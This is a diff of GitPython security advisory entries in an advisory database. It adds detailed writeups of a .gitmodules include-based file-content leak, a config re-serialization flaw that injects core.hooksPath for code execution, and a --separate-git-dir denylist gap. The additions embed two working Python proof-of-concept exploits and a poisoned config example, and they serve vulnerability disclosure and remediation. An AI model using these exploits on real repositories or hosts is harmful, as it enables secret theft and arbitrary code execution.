(first line) of any file readable by the victim process, triggered purely by attacker-controlled repository content and one routine, read-only GitPython call. Bounded to one line per triggering file (parsing aborts at the first `MissingSectionHeaderError`), but that line very often *is* the secret — `.env` files (`DATABASE_URL=...`, `API_KEY=...`), single-line credential/token files, `/etc/passwd`'s root entry for host fingerprinting. The primitive additionally serves as a generic error-based file-existence oracle for arbitrary host paths. This is materially stronger than the already-fixed, explicitly **blind** `GHSA-cwvm-v4w8-q58c` (\"Blind local file inclusion\", CVSS 4.0, `git/refs/symbolic.py` ref-name resolution) — that advisory's own writeup states it cannot disclose content; this one does, verbatim, via a different module (`git/config.py`'s include resolution).\n\n## Preconditions\n- Victim clones (or otherwise opens with GitPython) a repository whose `.gitmodules` is attacker-controlled — the default trust model for any tool that processes third-party repositories (dependency scanners, CI, code hosting/review bots, \"audit this repo\" utilities — exactly the class of application GitPython itself is built for).\n- Victim performs any operation that touches `repo.submodules` — one of the most ordinary GitPython operations, requiring no submodule `update`/`init`/checkout.\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py` — `GitConfigParser.__init__` defaults `merge_includes=True`.\n- `git/objects/submodule/base.py:273` — `SubmoduleConfigParser(fp_module, read_only=read_only)` passes neither `merge_includes` nor `repo=`; `git blame` shows this call unchanged since the class was introduced, and `git show 41ecc6a4` confirms that commit touched only `git/repo/base.py`'s `Repo.config_writer()`, never this call site.\n- `git/config.py` `_included_paths()`/`read()` (~630-685) — absolute include paths bypass the join/normpath entirely (`osp.isabs()` short-circuit); no repository-boundary containment check exists anywhere in this path.\n- `git/config.py` `_read()` (~493-498) — raises `cp.MissingSectionHeaderError(fpname, lineno, line)` with the raw file line embedded, matching Python stdlib `configparser`'s own `__str__` behavior.\n- `Submodule.iter_items()` catches only `(IOError, BadName)` — `configparser.Error` (the base of `MissingSectionHeaderError`) is not swallowed.\n- PoC (`gitpython-003-poc.py`, embedded below) reproduces this end-to-end against this exact checkout via the public API only (`Repo.clone_from` + `list(repo.submodules)`, default arguments, no monkeypatching), against both a throwaway secret file and `/etc/passwd`.\n\n## False-positive check (adversarial re-read)\n- **Is this the same bug as `GHSA-hmq2-w58f-27jc`?** No — that advisory is about the `.gitmodules` submodule *name* driving `_module_abspath`/`os.makedirs()` (creating a git repository/module directory outside the working tree, a write/RCE-adjacent primitive via a completely different function). This finding is about the `[include]` directive in the *same file* reaching a config-parser read primitive — a different mechanism, different function, different impact class (content disclosure, not directory creation).\n- **Is this the same bug as `GHSA-cwvm-v4w8-q58c` (blind LFI)?** No — that advisory is explicitly documented by its own reporter as content-free/blind (existence-only), and lives in `git/refs/symbolic.py`'s ref-name resolution feeding `Repo.commit`/`tree`/`index.diff` — an entirely different module and code path. This finding discloses actual file content via `git/config.py`'s include-directive resolution.\n- **Is the impact overstated given only one line leaks?** No — this is an accurate scoping caveat already reflected in the severity/impact discussion, not a reachability blocker: attacker has full control over which path is targeted (absolute paths work unconditionally), requires zero interaction beyond the single most common submodule operation, and the PoC demonstrates a real, working end-to-end disclosure through the standard `clone_from` + `list(repo.submodules)` workflow.\n- **Could the exception simply be silently swallowed by GitPython before reaching the caller?** No — confirmed by reading `Submodule.iter_items()`'s exception handling, which catches only `IOError`/`BadName`; `configparser.MissingSectionHeaderError` propagates uncaught.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently against both a throwaway secret file and `/etc/passwd`.\n\n## Remediation\nPass `merge_includes=False` when constructing `SubmoduleConfigParser` in `Submodule._config_parser()` (`git/objects/submodule/base.py`), mirroring the existing fix in `Repo.config_writer()` (commit `41ecc6a4`) — `.gitmodules` content is always attacker-controlled and should never be allowed to pull in `include`/`includeIf` directives. As defense in depth, `GitConfigParser.read()`'s include-path resolution should enforce that resolved include paths stay within the repository's own directory tree, and parsing-error messages (`MissingSectionHeaderError`/`ParsingError`) should avoid embedding raw file content when parsing a file the caller did not explicitly ask to open.\n\n## Confidence\nHigh. Root cause confirmed by direct code reading across both `git/config.py` and `git/objects/submodule/base.py`, cross-checked against the fix commit that hardened the sibling code path but not this one; exploit chain reproduced independently, twice, against the current HEAD (a throwaway secret file and `/etc/passwd`).\n\n\n## Proof-of-Concept source (`gitpython-003-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-003 PoC: `.gitmodules` -- fully attacker-controlled content shipped\ninside a cloned repository -- can contain `[include] path = `.\n`Submodule._config_parser()` builds the parser used for `repo.submodules` (and\nother submodule reads) via `SubmoduleConfigParser(fp_module, read_only=...)`\nwithout passing `merge_includes=False`, so the class default `merge_includes=True`\nis inherited. GitConfigParser then opens the target file; if it isn't valid\ngit-config syntax (true of virtually any non-gitconfig file), Python's\n`configparser.MissingSectionHeaderError` embeds the file's first line verbatim\nin its exception message, which propagates out of the ordinary, read-only\n`repo.submodules` call -- a non-blind local file content disclosure primitive.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-003-poc.py \n\nBenign: reads only the given (defaults to a throwaway secret file\ncreated under if omitted) and never writes/exfiltrates it anywhere\nexcept printing it locally to prove the primitive. No destructive action.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-003-poc\"\n target_file = sys.argv[2] if len(sys.argv) > 2 else os.path.join(workdir, \"secret.txt\")\n\n attacker_repo = os.path.join(workdir, \"attacker-repo\")\n dest = os.path.join(workdir, \"dest\")\n for p in (attacker_repo, dest):\n os.makedirs(p, exist_ok=True)\n\n if not os.path.exists(target_file):\n os.makedirs(os.path.dirname(target_file), exist_ok=True)\n with open(target_file, \"w\") as f:\n f.write(\"TOP-SECRET-DB-PASSWORD=hunter2-actual-secret-value\\n\")\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", attacker_repo], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"config\", \"user.email\", \"a@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"config\", \"user.name\", \"Attacker\"], check=True)\n\n with open(os.path.join(attacker_repo, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n\n with open(os.path.join(attacker_repo, \".gitmodules\"), \"w\") as f:\n f.write(\n '[submodule \"totally-normal-dep\"]\\n'\n \"\\tpath = vendor/dep\\n\"\n \"\\turl = https://example.com/dep.git\\n\"\n \"[include]\\n\"\n \"\\tpath = %s\\n\" % target_file\n )\n\n subprocess.run([\"git\", \"-C\", attacker_repo, \"add\", \"file.txt\", \".gitmodules\"], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n import configparser\n\n repo = git.Repo.clone_from(attacker_repo, dest)\n\n try:\n subs = list(repo.submodules)\n print(\"NOT VULNERABLE: no exception raised, submodules =\", subs)\n sys.exit(1)\n except configparser.MissingSectionHeaderError as e:\n msg = str(e)\n print(\"VULNERABLE: MissingSectionHeaderError leaked file content via repo.submodules:\")\n print(msg)\n with open(target_file) as f:\n first_line = f.readline().rstrip(\"\\n\")\n if first_line in msg:\n print(\"Confirmed: target file's first line is present verbatim in the exception message.\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: exception message did not contain the expected content\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78675" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2211" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/ef7568e3b317ce617eacda39b8b54dcdff8c3b5c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3785.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-78676.json b/advisories/BREW-fdroidserver-CVE-2026-78676.json index 2f8a61c85a..76b595695f 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-78676.json +++ b/advisories/BREW-fdroidserver-CVE-2026-78676.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-78676", "published": "2026-09-04T08:59:24Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:11:34Z", "upstream": [ "PYSEC-2026-3786", "CVE-2026-78676", @@ -52,21 +52,38 @@ } ] }, - "details": "GitPython before 3.1.59 fails to safely re-serialize multi-line git-config values during write operations, corrupting dormant quoted values into injected directives like core.hooksPath. Attackers can craft config files with embedded newlines that become live git directives after any unrelated GitPython config write, enabling arbitrary code execution via hook invocation.", + "summary": "GitPython: Dormant multi-line git-config values are corrupted into live injected directives (e.g. core.hooksPath) on any unrelated GitConfigParser write, enabling RCE", + "details": "- **CWE:** CWE-88 (Argument Injection) / CWE-94 (Code Injection) — via a read-then-corrupt-on-rewrite config round trip, not a direct setter argument\n- **Affected component:** `git/config.py` — `GitConfigParser._read()` (multi-line value decoding, lines 444-541, esp. `string_decode()` at line 460 and its call sites at 519/541) and `GitConfigParser._write()`/`write_section()` (serialization, lines ~694-712, esp. line 708)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\nGitPython added `UNSAFE_CONFIG_CHARS_RE` / `_value_to_string_safe()` / `_assure_config_name_safe()` guards (commits `c417af46`, `1ed1b924`, `a495ccd3`, and PR #2176) to reject a Python string containing a raw `\\r`/`\\n`/NUL byte, or syntax-bearing characters, when it is passed as an **argument** to `set()`, `set_value()`, `add_value()`, or `add_section()`. This closed the four config-injection GHSAs above.\n\nThat guard is applied only on the write-argument surface. It is never consulted for values that entered `GitConfigParser._sections` via `_read()` — i.e. values that came from parsing an on-disk config file. And `_read()` legitimately supports standard, spec-compliant git config syntax for multi-line values: a quoted value that is not closed on the same physical line continues onto the next physical line (git's own backslash-continuation syntax), and `string_decode()` (`.decode('unicode_escape')`) decodes a literal two-character `\\n` **escape sequence** inside such a value into a real embedded LF character in the resulting Python string. No raw control byte is ever written to disk to achieve this — it's the same syntax real `git` itself uses and accepts.\n\nThe bug is in what happens when that `GitConfigParser` is later **flushed**: `write_section()` (line ~694) calls the *unsafe* `self._value_to_string(v)` — not `_value_to_string_safe()` — and \"handles\" any embedded newline in the value with `.replace(\"\\n\", \"\\n\\t\")` (line 708), emitting a bare, unquoted `` in the output file with no re-quoting and no backslash-continuation marker. Real git does **not** treat an indentation-only continuation the way GitPython's writer assumes — a value only continues across physical lines when the *previous* line ends in a literal `\\` immediately before the newline. So the moment `write_section()` re-serializes a previously-decoded multi-line value this way, the second half of that value becomes an **independent, new config line** the next time anyone (GitPython or real `git`) parses the file. If an attacker chooses the dormant value's content to be `\\nhooksPath = `, that second line is parsed as a brand-new `core.hooksPath = ` directive — live, real Git configuration, not a value.\n\n`core.hooksPath` is honored by essentially every hook-firing git operation (`commit`, `checkout`, `merge`, `push`, `rebase`, ...), giving arbitrary code execution the next time the host application performs any hook-triggering operation.\n\n## Root cause\n`GitConfigParser`'s injection guard is asymmetric: it hardens every *write-argument* entry point (the fix for the four sibling GHSAs) but never hardens the **read → corrupt-on-rewrite round trip**. A value that is 100% legitimate and inert as parsed from disk becomes a newly-injected directive purely through GitPython's own broken re-serialization logic (`write_section()` using the unsafe value-to-string path plus a continuation scheme real git doesn't recognize). The `c417af46` commit message even states its intent explicitly: *\"This preserves existing read behavior for config files that already contain multiline values while preventing GitPython from writing new unsafe values\"* — i.e. the maintainers consciously scoped the fix to the write-argument surface and did not address what happens when an already-resident multi-line value gets rewritten.\n\n## Exploit path\n1. A `.git/config` (or any file merged into it via `[include]`, see below) already contains a dormant, syntactically-legitimate multi-line quoted value, e.g.:\n ```\n [core]\n \tzzz = \"A\\nhooksPath = ../evil-hooks\\\n \"\n ```\n No raw `\\r`, `\\n`, or NUL byte appears on disk — this is standard git quoting + backslash-continuation. Real `git config --get core.hookspath` returns nothing at this point (inert); `git config --get core.zzz` returns the decoded string `A\\nhooksPath = ../evil-hooks`, identically to GitPython's own reader.\n2. The host application opens this repo with GitPython (`git.Repo(path)`, `read_only=False` implicitly for a normal `config_writer()` use) and performs **any** single, unrelated, legitimate config write on the same `GitConfigParser` instance — e.g. `repo.config_writer().set_value(\"user\", \"name\", \"Test User\")`. This is one of the most ordinary operations a GitPython-based tool performs.\n3. `GitConfigParser._write()`/`write_section()` re-serializes every resident value, including the dormant `zzz` entry, using the unsafe path. The file on disk now contains, verbatim:\n ```\n [core]\n \t...\n \tzzz = A\n \thooksPath = ../evil-hooks\n ```\n4. Real `git config --get core.hookspath` now returns `../evil-hooks` — a key that did not exist before step 2, created purely by GitPython's own write.\n5. The next hook-firing git operation (e.g. `git commit`) executes `../evil-hooks/pre-commit` (or whatever hook name the operation looks for), i.e. arbitrary attacker-chosen code execution.\n\n## Impact\nArbitrary code execution, on par with (and more directly triggered than) the already-accepted, High-severity `GHSA-mv93-w799-cj2w`/`GHSA-v87r-6q3f-2j67` \"Newline injection... enables RCE via core.hooksPath\" advisories, and requiring **no unsafe caller argument at all** — only an attacker-influenced config file plus one ordinary, unrelated write.\n\n## Preconditions\n- A config file GitPython opens read-write already contains an attacker-chosen, syntactically-valid multi-line value shaped like `\\n = `. Realistic delivery:\n 1. **Pre-existing `.git` directory shipped with a repository** — vendored/template repos, CI workspace/layer caches that preserve `.git`, \"repo\" tarball/zip distributions that include `.git/config`. The poisoned value sits directly in `.git/config`.\n 2. **The documented shared-config `[include]` pattern** (`[include] path = ../`, pointing at a file inside the working tree) — `GitConfigParser.read()` merges included files' sections into the same `_sections` dict used for writing, so a malicious public repository can ship the poisoned value inside a normal tracked file and have it activated the first time any GitPython-based tool performs any unrelated config write after clone (this requires the victim's own `.git/config` to already reference the include, e.g. via project setup tooling that adds `include.path`).\n 3. **Any host application that opens an attacker-influenced config file for read-write and later performs a legitimate write** — the exact trust-boundary the maintainers already accepted as realistic for `GHSA-v87r-6q3f-2j67` (their writeup cites MLRun's `project.push()`).\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py:460` (`string_decode`), invoked at `git/config.py:519` and `:541` inside `_read()`'s multi-line handling — decodes `unicode_escape`, turning a literal `\\n` escape into a real embedded LF.\n- `git/config.py:~694-712` (`_write()`/`write_section()`) — uses `self._value_to_string(v)` (unsafe variant) and `.replace(\"\\n\", \"\\n\\t\")` with no re-quoting.\n- `c417af46` (the CR/LF/NUL guard commit) touches only the setter path and explicitly states it preserves existing *read* behavior for multi-line values, per its own commit message.\n- `git log -S\"string_decode\"`, `-S\"write_section\"`, `-S'replace(\"\\n\", \"\\n\\t\")'` on `git/config.py` show these code paths have only ever been touched by non-security formatting/refactor commits (`a5fc1d86`, `b825dc74`, `cb68eef0`, `21ec5299`), never by a security fix.\n- PoC (`gitpython-002-poc.py`, embedded below) reproduces the full chain end-to-end against this exact checkout: dormant value → one unrelated `config_writer()` write → `core.hookspath` becomes live per real `git config --get` → a subsequent `git commit` executes the injected hook and writes a benign marker file.\n\n## False-positive check (adversarial re-read)\n- **Is this just a repeat of the four already-fixed config-injection GHSAs?** No — all four require the *caller* to pass a Python string containing a raw control character or forbidden syntax character as an argument to a setter; all four are now blocked by `UNSAFE_CONFIG_CHARS_RE`/`VALID_CONFIG_OPTION_NAME_RE`/the section quote-state-machine. This finding requires no such caller argument: the payload is smuggled entirely inside a config *file* using standard, valid git escaping that the guard never inspects, and only becomes dangerous through GitPython's own unguarded re-serialization of a value it already holds. Confirmed via `_known-advisories.json` (26 entries, none withdrawn) — none describe this read→corrupt-on-rewrite mechanism.\n- **Does real git actually round-trip this value safely (i.e. is this a GitPython-only bug, not a \"normal\" file)?** Yes, confirmed empirically: after the same crafted `.git/config` is rewritten by *real* `git config user.name Test2` (a control test), the multi-line `zzz` entry is preserved byte-for-byte in its original quoted/continuation form — only GitPython's writer corrupts it.\n- **Is there a guard elsewhere that would catch the resulting bare `hooksPath = ...` line before it's trusted?** No — once on disk, it is indistinguishable from a directive the user set intentionally; `core.hooksPath` is honored unconditionally by git's hook-invocation machinery.\n- **Does this require an unrealistic precondition?** The precondition (a config file with attacker-influenced content, later legitimately rewritten) mirrors the exact threat model the maintainers already treated as realistic and fixed for `GHSA-v87r-6q3f-2j67`.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently end-to-end (dormant value in place → benign unrelated `config_writer()` write → `core.hookspath` live per real git → hook fires on `git commit`, marker file written).\n\n## Remediation\nEither (a) make `write_section()`/`_write()` use `_value_to_string_safe()` (or equivalent re-quoting) for **every** resident value, including those that originated from `_read()`, so an embedded newline is always re-emitted as a properly quoted+backslash-continued value rather than a bare new line, or (b) reject/neutralize embedded control characters in values at read time before they can reach `_sections` at all if the parser is opened in `read_only=False` mode, or (c) canonicalize output using git's own `git config --file --replace-all` semantics instead of a hand-rolled writer. Option (a) is the most surgical fix and matches the spirit of `_value_to_string_safe()` already used on the setter path.\n\n## Confidence\nHigh. Root cause independently re-derived and confirmed by direct code reading; full exploit chain (dormant value → benign unrelated write → live `core.hookspath` → hook execution with a benign marker) reproduced twice, independently, against the current HEAD.\n\n\n## Proof-of-Concept source (`gitpython-002-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-002 PoC: a dormant, legitimately-encoded multi-line git-config value\n(standard quoted + backslash-continuation syntax, containing an escaped \"\\\\n\"\nthat decodes to a real embedded newline in memory) is corrupted into a NEW,\nlive config key the moment GitConfigParser re-serializes it during any\nunrelated write. If the smuggled second \"line\" looks like\n\"hooksPath = \", it becomes a real, active core.hooksPath after\none unrelated GitPython config write, and fires attacker code on the next\nhook-triggering git operation (e.g. `git commit`).\n\nThis is CWE-88/CWE-94 style argument/config injection, but via the READ path\n(a config file GitPython parses and later rewrites), not via a Python kwarg\nargument -- distinct from the already-fixed GHSA-mv93-w799-cj2w /\nGHSA-v87r-6q3f-2j67 / GHSA-3rp5-jjmw-4wv2 / GHSA-jm78-9fvv-mhgr, which all\nguard the setter-argument surface only.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-002-poc.py \n\nBenign: only writes/reads inside . The \"malicious\" hook just writes a\nmarker file; no destructive/exfiltrating payload. Exits non-zero and prints\n\"NOT VULNERABLE\" if the corruption / hook does not fire.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-002-poc\"\n repo_dir = os.path.join(workdir, \"repo\")\n hooks_dir = os.path.join(workdir, \"evil-hooks\")\n marker = os.path.join(workdir, \"PWNED_MARKER.txt\")\n\n for p in (repo_dir, hooks_dir):\n os.makedirs(p, exist_ok=True)\n if os.path.exists(marker):\n os.remove(marker)\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", repo_dir], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.name\", \"Test\"], check=True)\n\n # Rewrite .git/config with a dormant, 100%-valid multi-line quoted value\n # inside [core] (before any other section). No raw CR/LF/NUL byte is\n # written to disk here -- this is standard git config quoting +\n # backslash-line-continuation, decoded by both real git and GitConfigParser\n # into the Python string 'A\\nhooksPath = ../evil-hooks'.\n cfg_path = os.path.join(repo_dir, \".git\", \"config\")\n with open(cfg_path) as f:\n original = f.read()\n poisoned_entry = '\\tzzz = \"A\\\\nhooksPath = ../evil-hooks\\\\\\n\"\\n'\n # Insert right after the [core] header line so it lives in the same section.\n new_config = original.replace(\"[core]\\n\", \"[core]\\n\" + poisoned_entry, 1)\n with open(cfg_path, \"w\") as f:\n f.write(new_config)\n\n # Confirm it's inert per real git before touching GitPython.\n pre = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if pre.returncode == 0:\n print(\"SETUP ERROR: core.hookspath already set before GitPython touched anything\")\n sys.exit(2)\n\n # Malicious hook: benign marker only.\n hook_path = os.path.join(hooks_dir, \"pre-commit\")\n with open(hook_path, \"w\") as f:\n f.write('#!/bin/sh\\necho \"PWNED-VIA-GITPYTHON-CONFIG-INJECTION\" > \"%s\"\\nexit 0\\n' % marker)\n os.chmod(hook_path, 0o755)\n\n import git # gitpython under test\n\n repo = git.Repo(repo_dir)\n before = repo.config_reader().get_value(\"core\", \"zzz\")\n print(\"core.zzz before any GitPython write =\", repr(before))\n\n # ONE totally unrelated, benign write -- this is the only \"attacker-adjacent\"\n # action required, and it is something virtually every GitPython consumer\n # does routinely (setting an option, adding a remote, updating a branch's\n # tracking config, ...).\n with repo.config_writer() as cw:\n cw.set_value(\"user\", \"name\", \"Test User\")\n\n post = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if post.returncode != 0:\n print(\"NOT VULNERABLE: core.hookspath still absent after the unrelated write\")\n sys.exit(1)\n\n injected_path = post.stdout.strip()\n print(\"core.hookspath is now LIVE after one unrelated write:\", injected_path)\n\n # Trigger the hook with a normal commit to prove it fires.\n with open(os.path.join(repo_dir, \"file2.txt\"), \"w\") as f:\n f.write(\"change\\n\")\n subprocess.run([\"git\", \"-C\", repo_dir, \"add\", \"file2.txt\"], check=True)\n subprocess.run(\n [\"git\", \"-C\", repo_dir, \"-c\", \"user.email=t@example.com\", \"-c\", \"user.name=T\",\n \"commit\", \"-q\", \"-m\", \"trigger hook\"],\n check=True,\n )\n\n if os.path.isfile(marker):\n with open(marker) as f:\n content = f.read().strip()\n print(\"VULNERABLE: hook fired, marker content =\", content)\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: hook did not fire\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78676" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3786.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-78677.json b/advisories/BREW-fdroidserver-CVE-2026-78677.json index 17fe7005f5..154bef2963 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-78677.json +++ b/advisories/BREW-fdroidserver-CVE-2026-78677.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-78677", "published": "2026-09-04T08:59:24Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "PYSEC-2026-3787", "CVE-2026-78677", @@ -52,21 +52,50 @@ } ] }, - "details": "GitPython before 3.1.59 omits --separate-git-dir from unsafe_git_clone_options, allowing attackers to create arbitrary git directories outside the intended clone destination. Attackers can pass a separate_git_dir parameter to Repo.clone_from() or Repo.clone() to redirect repository metadata to an attacker-controlled filesystem path, enabling arbitrary directory creation and potential hook execution.", + "summary": "GitPython: clone_from()/clone() omit --separate-git-dir from unsafe_git_clone_options, enabling arbitrary git-directory creation outside the destination", + "details": "- **CWE:** CWE-73 (External Control of File Name or Path) / CWE-22 (Path Traversal, in the \"escapes intended base directory\" sense)\n- **Affected component:** `git/repo/base.py`, `Repo.unsafe_git_clone_options` (class attribute, lines 153-165) and `Repo._clone()` (lines 1477-1520), reached via the public `Repo.clone_from()` (line 1626) and `Repo.clone()` (line 1567) APIs.\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`Repo.clone_from(url, to_path, **kwargs)` (and `Repo.clone()`) forward arbitrary keyword arguments to the underlying `git clone` invocation. Before forwarding, GitPython builds a candidate option list from the kwargs (`Git._option_candidates`) and checks it against a denylist, `Repo.unsafe_git_clone_options`, via `Git.check_unsafe_options()` — *unless* the caller passes `allow_unsafe_options=True`. This denylist mechanism is exactly the guard that the last ~16 published GHSAs against this repo (2026-07-12 → 2026-08-05) have repeatedly found incomplete or bypassable for other options (`--template`, `--upload-pack`, `--config`, `--exec`, `--output`, `--index-output`, `--pathspec-from-file`, etc.).\n\n`git clone` also accepts `--separate-git-dir=`, which redirects the repository's entire `.git` metadata directory to an **arbitrary, caller-controlled filesystem path**, leaving only a gitlink text file (`gitdir: `) at the intended destination. This is the exact same primitive already recognized as unsafe by GitPython's own code: `Repo.unsafe_git_init_options` (line 145-150) blocks `--separate-git-dir` for `Repo.init()`, with the comment *\"Redirects the repository metadata to a caller-controlled path\"*. The `Repo._clone()`/`clone()`/`clone_from()` docstring (line 1450-1452) is even more explicit:\n\n```\n:param allow_unsafe_options:\n Allow unsafe options to be used, such as ``--template`` and\n ``--separate-git-dir``.\n```\n\ni.e. the maintainers' own documentation states that `allow_unsafe_options=False` (the default) is supposed to block `--separate-git-dir` for clone. But **`Repo.unsafe_git_clone_options` does not contain it**:\n\n```python\nunsafe_git_clone_options = [\n \"--upload-pack\",\n \"-u\",\n \"--config\",\n \"-c\",\n \"--template\",\n \"--bundle-uri\",\n]\n```\n\nSo any application that forwards a `separate_git_dir` (or `separate-git-dir`) kwarg into `Repo.clone_from()` / `Repo.clone()` — e.g. a CI/build service, a Git-hosting proxy, or any tool that exposes a subset of clone options to a client, the exact threat model already accepted for the sibling `--template`/`--upload-pack`/`--config` entries in this same list — gets **no protection at all** for `--separate-git-dir`, even with the default `allow_unsafe_options=False`.\n\n## Root cause\nParity gap between two sibling denylists that guard the same underlying primitive (arbitrary redirection of git metadata storage): `unsafe_git_init_options` correctly lists `--separate-git-dir`; `unsafe_git_clone_options`, covering the same option on a different git subcommand that also accepts it, does not — despite the function's own docstring claiming otherwise. This is the same \"denylist omits an equally-dangerous sibling option\" pattern already responsible for `GHSA-539m-9xh6-q6rr` (`archive` denylist missing `--add-file`/`--add-virtual-file`) and `GHSA-6p8h-3wgx-97gf` (`clone` denylist missing `--template`, since fixed).\n\n## Exploit path\n1. Attacker-controlled input reaches a `separate_git_dir=...` (or equivalently `\"separate-git-dir\"`) keyword argument passed into `Repo.clone_from()` / `Repo.clone()` by the host application, with `allow_unsafe_options` left at its default `False`.\n2. `Git._option_candidates()` renders this as `--separate-git-dir` and `Git.check_unsafe_options()` checks it against `Repo.unsafe_git_clone_options` — no match, no `UnsafeOptionError` raised.\n3. `Git.transform_kwargs()` renders the same kwarg into the real command line as `--separate-git-dir=` and GitPython executes `git clone -v --separate-git-dir= -- ` via `subprocess` (no shell).\n4. `git` itself creates the full repository metadata tree (`config`, `description`, `HEAD`, `hooks/`, `index`, `objects/`, `refs/`, `packed-refs`, `logs/`) at the attacker-specified path — which can be **any path outside the intended clone destination** that the process has permission to create — and leaves a gitlink file at the intended destination pointing to it.\n\n## Impact\nArbitrary directory/file creation at a path fully controlled by the attacker (bounded only by filesystem permissions of the process running GitPython), matching the impact class of the already-published, High-severity `GHSA-hmq2-w58f-27jc` (\"Arbitrary Git Repository Creation Outside the Working Tree\", CVSS 8.2). Concretely:\n- Planting a git repository structure (including a `hooks/` directory) at an attacker-chosen location outside the sandboxed clone destination the calling application intended to confine the operation to.\n- If the attacker-chosen path collides with an existing directory the process can write into (e.g. another repository's `.git`, a shared cache path, a predictable temp location), the clone silently populates/overwrites `config`, `HEAD`, `hooks/*`, `refs/*`, `packed-refs`, and `index` there — an integrity violation of a resource outside the intended destination.\n- Combined with any later operation that runs 